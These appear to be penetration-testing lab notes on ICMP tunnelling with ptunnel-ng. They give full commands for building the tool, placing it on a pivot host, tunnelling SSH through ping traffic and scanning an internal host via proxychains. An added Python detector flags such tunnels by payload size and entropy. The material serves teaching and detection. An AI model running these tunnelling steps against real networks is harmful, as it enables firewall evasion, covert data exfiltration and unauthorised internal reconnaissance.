ICMP tunneling encapsulates your traffic within ICMP packets containing echo requests and responses.
When a host within a firewalled network is allowed to ping an external server, it can encapsulate its traffic within the ping echo request and send it to an external server. The external server can validate this traffic and send an appropriate response, which is extremely useful for data exfiltration and creating pivot tunnels to an external server.
We will use the ptunnel-ng tool to create a tunnel between our Ubuntu server and our attack host. Once a tunnel is created, we will be able to proxy our traffic through the ptunnel-ng client. We can start the ptunnel-ng server on the target pivot host.
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng/
sudo ./autogen.sh
After running autogen.sh, ptunnel-ng can be used from the client and server-side. We will now need to transfer the repo from our attack host to the target host.
# Alternative approach: building a static binary (no shared-library dependencies on the pivot host)
sudo apt install automake autoconf -y
cd ptunnel-ng/
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh
./autogen.sh
# Transferring ptunnel-ng to the pivot host
scp -r ptunnel-ng ubuntu@10.129.202.64:~/
# Starting the server on the pivot host
sudo ./ptunnel-ng -r10.129.202.64 -R22
The IP address following -r should be the IP we want ptunnel-ng to accept connections on. In this case, whatever IP is reachable from our attack host would be what we would use. We would benefit from using this same thinking & consideration during an actual engagement.
On the attack host, we can attempt to connect to the ptunnel-ng server (-p <ipAddressofTarget>), but ensure this happens through local port 2222 (-l2222). Connecting through local port 2222 allows us to send traffic through the ICMP tunnel.
# Starting the client on the attack host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
# Tunneling an SSH connection through the ICMP tunnel
ssh -p2222 -lubuntu 127.0.0.1
We may also use this tunnel and SSH to perform dynamic port forwarding to allow us to use proxychains in various ways.
# Enable Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
proxychains nmap -sV -sT 172.16.5.19 -p3389
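The tunnel above only works because echo requests are allowed out, and that is also what gives a defender a handle on it: a stock ping carries a predictable payload (the Windows tool sends a fixed 32-byte alphabet string, iputils on Linux fills each byte with its own offset after the timestamp), while tunnelled traffic arrives as oversized, high-entropy payloads in a steady stream from one host. The following detector is an added example written for these notes, not code from the page or from the ptunnel-ng project. It parses raw IPv4/ICMP frames, separates stock-ping payloads from anything else, and scores each source by payload size, entropy and request count. The sample frames, the 192.0.2.x / 198.51.100.x / 203.0.113.x addresses and the thresholds are constructed assumptions for the demonstration, not values from a real capture.

```python
"""
Illustrative ICMP-tunnel detector (added example, not part of the original
notes or of ptunnel-ng). Flags echo requests whose payloads do not match a
stock ping and hosts that send many echo requests in one capture window.
All sample frames below are constructed inline so the script runs offline.
"""
import math
import struct
from collections import Counter, defaultdict

# Fixed 32-byte payload sent by the Windows ping utility.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum (used for the IP and ICMP headers)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(src: str, dst: str, payload: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """Construct a minimal IPv4 + ICMP echo request frame (sample data only)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0x4000, 64, 1, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def parse_icmp(frame: bytes):
    """Return (src, dst, icmp_type, payload) for an IPv4 ICMP frame, else None."""
    if len(frame) < 28 or frame[0] >> 4 != 4 or frame[9] != 1:
        return None
    ihl = (frame[0] & 0x0F) * 4
    src = ".".join(str(b) for b in frame[12:16])
    dst = ".".join(str(b) for b in frame[16:20])
    icmp = frame[ihl:]
    if len(icmp) < 8:
        return None
    return src, dst, icmp[0], icmp[8:]


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; random or encrypted data approaches 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_like_stock_ping(payload: bytes) -> bool:
    """True for the default payloads of the Windows and iputils (Linux) ping tools."""
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    # iputils sets payload byte i to the value i, then overwrites the first 8 or
    # 16 bytes (depending on build) with a timestamp; check from offset 16 on.
    return len(payload) >= 24 and all(payload[i] == (i & 0xFF) for i in range(16, len(payload)))


def analyze(frames, size_threshold=64, entropy_threshold=6.0, rate_threshold=10):
    """Summarise echo requests per source and list tunnel-like indicators.

    Returns {src: {"requests", "suspicious", "max_payload", "max_entropy", "reasons"}}.
    Thresholds are assumptions; tune them against a baseline of your own traffic.
    """
    stats = defaultdict(lambda: {"requests": 0, "suspicious": 0, "max_payload": 0,
                                 "max_entropy": 0.0, "reasons": []})
    for frame in frames:
        parsed = parse_icmp(frame)
        if parsed is None:
            continue
        src, _dst, icmp_type, payload = parsed
        if icmp_type != 8:  # echo requests only; replies mirror the request payload
            continue
        s = stats[src]
        s["requests"] += 1
        if looks_like_stock_ping(payload):
            continue
        s["suspicious"] += 1
        s["max_payload"] = max(s["max_payload"], len(payload))
        s["max_entropy"] = max(s["max_entropy"], shannon_entropy(payload))
    for src, s in stats.items():
        if s["max_payload"] > size_threshold:
            s["reasons"].append(f"payload up to {s['max_payload']} bytes")
        if s["max_entropy"] > entropy_threshold:
            s["reasons"].append(f"payload entropy {s['max_entropy']:.2f} bits/byte")
        if s["suspicious"] and not s["reasons"]:
            s["reasons"].append("non-standard ping payload")
        if s["requests"] > rate_threshold:
            s["reasons"].append(f"{s['requests']} echo requests in capture window")
    return dict(stats)


# Constructed sample capture: one Linux ping, one Windows ping, and a burst of
# oversized pseudo-random payloads standing in for tunnelled traffic.
LINUX_PAYLOAD = (1700000000).to_bytes(8, "little") + (123456).to_bytes(8, "little") + bytes(range(16, 56))
TUNNEL_PAYLOAD = bytes((i * 7919 + 13) % 251 for i in range(1024))  # deterministic high-entropy filler
SAMPLE_FRAMES = [build_echo_request("192.0.2.10", "192.0.2.1", LINUX_PAYLOAD),
                 build_echo_request("192.0.2.20", "192.0.2.1", WINDOWS_PING_PAYLOAD)]
SAMPLE_FRAMES += [build_echo_request("198.51.100.7", "203.0.113.9", TUNNEL_PAYLOAD, seq=i) for i in range(1, 13)]

if __name__ == "__main__":
    for src, s in analyze(SAMPLE_FRAMES).items():
        verdict = "; ".join(s["reasons"]) or "looks like normal ping"
        print(f"{src}: {s['requests']} echo requests, {s['suspicious']} suspicious -> {verdict}")
```

The entropy check is what separates a real tunnel from an admin running `ping -s 1000`: large padding is still low-entropy, whereas encrypted or compressed tunnel data sits near 8 bits per byte. In practice the same logic is easier to run as a query over NetFlow or Zeek `icmp` logs than over raw frames, but the indicators are identical: payload size, payload pattern, and echo-request volume per internal host.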
Questions
sudo scp -r autoconf_2.72-3_all.deb ubuntu@10.129.202.64:~/
sudo scp -r automake1.4_1.4-p6-13.1_all.deb ubuntu@10.129.202.64:~/
sudo scp -r pkg-config_0.29.1-0ubuntu4_amd64.deb ubuntu@10.129.202.64:~/
sudo scp -r m4_1.4.18-4_amd64.deb ubuntu@10.129.202.64:~/
sudo scp -r autotools-dev_20180224.1_all.deb ubuntu@10.129.202.64:~/